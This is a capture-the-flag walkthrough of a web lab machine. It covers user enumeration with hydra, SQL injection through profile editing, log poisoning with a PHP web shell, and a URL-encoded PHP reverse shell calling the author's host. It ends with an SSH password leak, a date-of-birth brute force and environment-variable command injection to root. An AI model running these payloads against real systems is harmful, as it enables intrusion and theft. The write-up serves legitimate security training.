Target IP: 10.10.186.166
Challenge Description:
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Performing an aggressive port scan against the open TCP ports returns the result above. I will start enumeration with the HTTP application on port 80 to begin with.
Port 80: HTTP
The login webpage above is displayed for this web application. The source-code of this webpage does not contain anything useful. I tried spraying default credentials but I had no luck. I also tested the inputs for SQL injection, but it did not work either. I notice the application does allow registration.
I created a new account with the credentials test:tester and logged in successfully. The webpage above is presented to me after logging in. There is another user called WWBuddy and I was able to send a message to this user. I notice I cannot change my profile picture, so I cannot upload a webshell.
From source-code enumeration, I found another page called chat.php. Viewing the source-code of this page contains the interesting user ids above. The other user, WWBuddy, has the user id of fc18e5f4aa09bbbb7fdedf5e277dda00 as shown above.
During manual enumeration, I was performing a directory search using the command gobuster dir -u http://10.10.186.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt. During its search, it managed to find a directory called /api. I also found the JavaScript code file called chat.js as shown in the image above.
The JavaScript source code contains the interesting API route /api/messages/ with the parameter uid as shown above. Maybe I can use this to read the messages of the user WWBuddy?
Using Burpsuite, I managed to read the messages of the new user I created using the API. However, I am unable to read the messages of the user WWBuddy using this attack vector.
I tried to find other possible users of the application and found two new users: henry and roberto using the command hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -p 123 10.10.186.166 http-post-form "/login/index.php:username=^USER^&password=123:No account found with that username.". I tried to bruteforce the passwords of the three users, but I had no luck.
Using the Edit Info button, I changed the username to WWBuddy' OR '1'='1'-- // to see if the application is vulnerable to SQL injection. I also tried changing the password to tester. After this, I logged in the user WWBuddy successfully. However, this user does not have useful messages. However, I can still read the messages of the user henry and roberto.
The messages between the user roberto and henry is interesting. Apparently the SSH password is the employee birthday.
Logging into the user roberto contains the user information above. This user's birthday is 04/14/1995. Before attacking the SSH application, I wish to enumerate a bit further.
Using feroxbuster, I obtained the entries above. There are interesting directories shown above. I find the directory /admin interesting.
Browsing to /admin was inaccessible. However, when I logged into the web application as the user henry, I had access to this page! This page contains the information above. The source-code of this webpage contains the first flag. This is a log file. Maybe I can poison it? I notice only the valid users are logged. Maybe I can change the username of the new user to a PHP webshell?
I managed to successfully change the username of the new user to the PHP payload <?php system($_GET['cmd']); ?>, as shown above. Then I browsed to the /admin page to poison the log.
And now I successfully poisoned the log as shown above. I deployed the commands whoami;id;ls and the received the output above. Time to obtain a reverse shell connection now. Since the target machine is already using PHP, I can use a PHP reverse shell script.
I started a listener on my machine at port 8443. Then using the poisoned PHP log file, I deployed the URL-encoded PHP payload: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. And then I obtained a reverse shell connection on my machine at port 8443, as shown above. Now I have a foothold on the target machine with the session as www-data.
I did some manual enumeration and I found a few things such as the authenticate binary, but I was unable to escalate it due to a low shell access. Then I transferred Linpeas to the target machine. It managed to find the SSH password yVnocsXsf%X68wf of the user roberto as shown above.
Then I connected to the target machine via SSH as the user roberto and the new password successfully.
This user has an interesting file called importante.txt as shown above. This file contains the user.txt too. I will need to translate the text first.
I translated the text using Google Translate and received the message above. What is this gift this user is talking about? And in one week? I ran the binary /bin/authenticate and received the message roberto developer. You are already a developer.. Now I am confused. The only option left now is escalating privileges to the user jenny. From previous enumeration, is it likely the user jenny is using the old SSH password format in DOB? Her DOB is likely in 1994. After some trial and error, I calculated her potential DOB.
And then I stored the potential DOBs in a file called dates. Then bingo! It looks like she is still on the old password format as her password is her DOB 08/03/1994.
Now I can access the SSH as this new user as shown above. The binary authenticate is responsible for checking a few things. After setting the environment variable USER to ; cat /root/root.txt, I obtained the flag THM{ch4ng3_th3_3nv1r0nm3nt}. .
The first flag.
The second flag is located inside the importante.txt and shown above.. The third/root flag is THM{ch4ng3_th3_3nv1r0nm3nt}. I forgot to obtain a screenshot of it.